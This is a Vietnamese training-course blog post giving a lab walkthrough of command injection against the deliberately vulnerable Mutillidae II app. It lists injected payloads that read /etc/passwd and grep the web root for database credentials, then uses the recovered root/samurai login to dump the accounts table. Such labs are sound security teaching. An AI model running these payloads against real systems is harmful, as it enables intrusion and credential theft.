Powered by Blogger.
Home » , , » OWASP Top 10 Web Hacking Final Lab 2 - Command Injection Database Interrogation

OWASP Top 10 Web Hacking Final Lab 2 - Command Injection Database Interrogation

Written By Akademy on Thursday, November 21, 2013 | 8:35 PM

{ Command Injection Database Interrogation }
OWASP Top 10 Web Hacking Final Lab 2

Bài thực hành cuối khóa của lớp OWASp Top 10 Web Hacking
  • Lưu ý là các IP sẽ khác với hệ thống lab của các bạn, ngoài ra hình ảnh minh họa trên Backtrack, chúng ta sẽ thực hiện trên Attacker là Kali hoặc là máy thật tùy tình huống.
  • https://cybrary.com.vn
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
  • What is Fuzzing?
    • Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
 Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.48.129 in the following URL --> http://192.168.48.129/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.48.129/mutillidae

Section 8. Basic Command Execution Testing
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
  2. Test DNS Lookup
    • Notes (FYI):
      • DNS Lookup on the surface is design to do just that,,, provide a DNS Lookup.
    • Instructions:
      1. Hostname/IP: www.cnn.com
      2. Click the Lookup DNS button
      3. View your Results
  3. Test DNS Lookup Vulnerability
    • Notes (FYI):
      • Now we will test a security vulnerable that will let us append a Unix/Linux command to the end of the hostname we are looking up.
      • The procedure of appending a ";" after what the application expects, is called command fuzzing.
      • Below you will run the "uname -a" command  
    • Instructions:
      1. Hostname/IP: www.cybrary.com.vn; uname -a
      2. Click the Lookup DNS button
      3. View your Results
  4. Perform Reconnaissance
    • Notes (FYI):
      • Don't you think it would be nice to know where there particular web page application is running from?
      • Now we are going to run the "pwd" to show us the current working directory.
      • Also, notice in the Address Bar that the application is called dns-lookup.php  
    • Instructions:
      1. Hostname/IP: www.cybrary.com.vn; pwd
      2. Click the Lookup DNS button
      3. View your Results
      4. Notice that dns-lookup.php is the vulnerable program.
  5. Interrogate the dns-lookup.php application
    • Notes (FYI):
      • Just for grins, let's see if we can find the line of code where PHP is executing a system call.
      • I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
      2. Click the Lookup DNS button
      3. View your Results
        • Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".

Section 9. Database Reconnaissance
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • MySQL is the database engine
  2. Discover the Database Engine using the "ps" command
    • Notes (FYI):
      • Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • The mysqld (daemon) is running.

Section 10. Database Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first list all the php scripts.
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php"
      2. Click the Lookup DNS button
      3. View your Results
        • There is over 900+ php scripts.
  2. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  3. Obtain password from search results
    • Notes (FYI):
      • Now you have to look closely to see the string password and the actual password "samurai".
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabasePassword = "samurai";
  4. Search MySQLHandler.php for the strings user OR login
    • Notes (FYI):
      • We now know that MySQLHandler.php contains the database password.
      • The only thing left it to obtain the database username for the password samarai.
    • Instructions:
      1. Hostname/IP:
        • www.cybrary.com.vn; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  5. Obtain username from search results
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabaseUsername = "root";
      2. Notice the MySQL connection method.
        • mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
  6. Display MySQLHandler.php
    • Notes (FYI):
      • I guess I could have showed you this first, but good things come to those that wait.
      • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Hostname/IP:
        • www.cybrary.com.vn; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  7. Viewing the Code
    • Notes (FYI):
      • Kind of scary,,, right?
      • Typically, you should never put authentication information into a program that accesses a database on the web.
    • Instructions:
      1. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      2. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      3. Database Name
        • static public $mMySQLDatabaseName = "nowasp";
    • Có thể khác với mô hình Lab của các bạn
Section 11. Connect Remotely to MySQL
  1. On BackTrack (hay Kali), Open a Terminal
    • Instructions:
      1. Click on the Terminal Icon
  2. Connect Remotely to the Mutillidae Database
    • Notes (FYI):
      • Replace 192.168.48.129 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. mysql -h 192.168.48.129 -uroot -psamurai
      2. show databases;
      3. use nowasp;
  3. Table Navigation
    • Notes (FYI):
      • Basically, we are looking for a table that contains username and password information.
      • In this case, the account table contain the authentication information.
    • Instructions:
      1. show tables;
      2. desc accounts;
  4. Display Account Table Records
    • Instructions:
      1. select * from accounts;
      2. quit;
Section 12. Proof of Lab
  1. Nộp bài 
    • Quay video lại quá trình thực hiện, hãy kèm theo textnote tên của người thực hiện và gởi về Admin của class https://www.facebook.com/groups/853782641427509/ 
Share this article :

0 comments:

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT